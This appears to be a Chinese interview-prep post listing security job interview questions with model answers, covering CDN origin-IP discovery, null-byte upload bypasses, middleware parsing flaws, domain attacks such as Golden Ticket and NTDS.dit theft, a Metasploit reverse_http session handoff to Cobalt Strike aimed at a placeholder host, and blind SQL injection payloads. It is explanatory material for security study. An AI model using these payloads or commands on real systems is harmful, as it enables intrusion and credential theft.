奇安信春招二面的问题

1. 如何有效识别和绕过CDN防护获取源站真实IP？
完善答案：

1. DNS历史记录追溯：通过SecurityTrails、ViewDNS等平台查询域名历史解析记录，寻找未启用CDN时的A记录。
2. 子域名资产测绘：利用censys.io扫描未接入CDN的测试环境子域名（如dev.example.com）。
3. SSL证书指纹匹配：通过Censys搜索源站独有证书的SHA256指纹，定位真实IP。
4. 邮件服务溯源：分析邮件头Received字段，获取内部邮件服务器IP。
5. 全球节点探测：对比不同CDN节点的TTL值差异，识别真实IP段。
6. 文件特征哈希识别：计算网站favicon.ico的mmh3哈希，通过FOFA匹配源站IP。

2. 文件上传漏洞中%00截断的原理及利用条件是什么？
完善答案：
原理：%00（空字节）在C语言中作为字符串终止符，PHP因继承C特性会截断后续内容。例如上传evil.php%00.jpg时，PHP解析为evil.php。
利用条件：

• PHP版本<5.3.29
• GPC（魔术引号）关闭
• 路径拼接可控（如/upload/1.php%00/1.jpg）
  防御：升级PHP版本、过滤空字节、使用白名单校验。

3. 常见中间件解析漏洞有哪些？请举例说明。
完善答案：

1. IIS 6.0：
   • 目录解析：/xx.asp/xx.jpg（xx.asp为文件夹）
   • 分号解析：xx.asp;.jpg。
2. Nginx <0.8.37：
   • Fast-CGI解析：/xx.jpg/1.php触发PHP解析。
3. Apache：
   • 后缀从右向左解析：test.php.x1.x2.x3识别为PHP。
4. IIS 7.0/7.5：
   • Fast-CGI配置错误导致任意文件解析。

4. 描述一次内网渗透测试的关键步骤和技术亮点。
完善答案：
案例：通过钓鱼邮件获取初始立足点，利用MS17-010漏洞横向移动至域控服务器。
技术亮点：

• 权限维持：使用Golden Ticket伪造TGT，绕过Kerberos认证。
• 数据窃取：通过SMB协议窃取NTDS.dit文件，提取域用户哈希。
• 隐蔽通信：利用DNS隧道传输数据，规避防火墙检测。

11. 黄金票据（Golden Ticket）的攻击原理及防御措施是什么？
完善答案：
原理：伪造TGT（票据授予票据），需获取KRBTGT账户的NTLM哈希、域SID及域名。攻击者无需与域控交互即可生成任意用户的服务票据。
防御：

• 定期重置KRBTGT密码（至少每180天）
• 启用Windows事件日志监控异常TGS请求
• 限制域管理员权限，启用LAPS管理本地管理员密码。

5. 如何将Metasploit会话迁移到Cobalt Strike？
完善答案：

1. 生成CS监听器：在CS中创建Foreign HTTP监听器。
2. MSF注入Payload：

   use exploit/windows/local/payload_inject  
   set PAYLOAD windows/meterpreter/reverse_http  
   set LHOST <CS_IP>  
   set LPORT <CS_PORT>  
   exploit  
   

3. 会话传递：MSF会话将自动注入到CS Beacon。

6. 时间盲注（Time-Based Blind SQLi）的原理及常用函数有哪些？
完善答案：
原理：通过条件语句触发数据库延时响应，推断查询结果（如IF(1=1,SLEEP(5),0)）。
函数：

• MySQL：SLEEP(), BENCHMARK(), IF()
• MSSQL：WAITFOR DELAY '0:0:5'
• PostgreSQL：pg_sleep(5)
• Oracle：DBMS_PIPE.RECEIVE_MESSAGE('',5)